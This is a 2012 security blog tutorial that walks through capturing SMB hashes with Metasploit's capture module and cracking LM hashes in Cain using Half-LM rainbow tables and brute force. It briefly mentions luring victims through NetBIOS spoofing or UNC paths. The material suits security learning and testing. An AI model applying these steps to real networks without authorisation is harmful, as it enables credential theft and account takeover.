Refresher Series - Capturing and cracking SMB hashes with Cain and Half-LM rainbow tables.

Thursday, December 20, 2012

f8lerror

71d85bb5d111973cb65dfee3d2a7e6c9

First things first, what is an LM Hash or Lan Manager Hash? A LM Hash is an outdated hashing function, however still widely in use in corporate environments today. The most important features of a LM hash is as follows:

  • Passwords are a Maximum of 14 characters or 14 bytes.
  • Passwords are converted to uppercase
  • Passwords are padded to 14 bytes
  • The 14 byte password is split into two 7 byte halves. (This is the weakness exploited by the Half LM attack)
  • Read more about LM hashes at http://en.wikipedia.org/wiki/LM_hash

Simply put, if a user chooses a password of ‘Password’ the LM hashing function changes it into “PASSWOR” and “D”, or if they choose “PaSSwOrD12345!” it is changed to “PASSWOR” and “D12345!”.  Obviously cracking two short passwords will take less time than 1 long password.


Before you can use the Half-LM rainbow tables you either need to download them or generate them yourself like I did using Winrtgen which is included with Cain.  When using Winrtgen it is important to note the disk space and Success probability. This is directly influenced by the Charset and the Number of tables.  In the image below you see that the tables will only recover 97% of passwords using the alpha-numeric-symbol14 charset. You will also want to run the Benchmark to see how long it will take you to generate the tables. On a side note you can divide the tables.lst file to distribute load, even among cores as Winrtgen is not written for multicore support. Then we wait…..  

image
 

On to the fun stuff, to capture a hash we want to use the Metasploit capture SMB auxiliary module, which is located in auxiliary/server/capture/smb. Leave the default settings with the exception of the CAINPWFILE. Set this to output the file where ever you like.


image

Now you wait, you can do various things to coerce the victims to come to you such as NetBIOS spoofing or embedding UNC paths, but that’s a topic for another day. When a user attempts to connect to the capture server you will see output similar to this. The important thing to note is that the capture contains an LM Hash.  

image

When you’re ready you can load the hashes into Cain, by selecting the Cracker tab then the plus symbol to add your hashes from a list.  

image

The select the hashes you want to crack and right click, selecting Cryptanalysis attack, Half-LM hashes + challenge, via Rainbow tables.  

 image

Load your tables and let it run. The amount of running time depends on the amount of hashes.  

image

When it is done you have a result similar to the image below. As you can see we have not recovered the actual password yet, but we’re close. Let’s finish them off.

  image

Follow the similar procedure as above by right clicking the hashes, but this time you’re going to select brute-force attack and LM Hashes + Challenge. As you can see I set the Max length to 3, that’s because I assume that nobody picked a password over 10 characters, which is probably a pretty good assumption in this case. ;)

image Remember we already cracked 7 of the characters.  As you can see the 2nd half of the passwords are cracked extremely fast.  

image

Cain then does a quick case brute force against the cracked password to determine its proper case, as you can see the passwords were recovered.

 
image  
 

That’s it! It is actually simpler in practice then it appears here. Good luck and have fun. Cross-Posted from infosecsee.com

Possibly Related Articles:
13039
General Network->General
Information Security
cracking Hacking Tools Hashing
Post Rating I Like this!
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.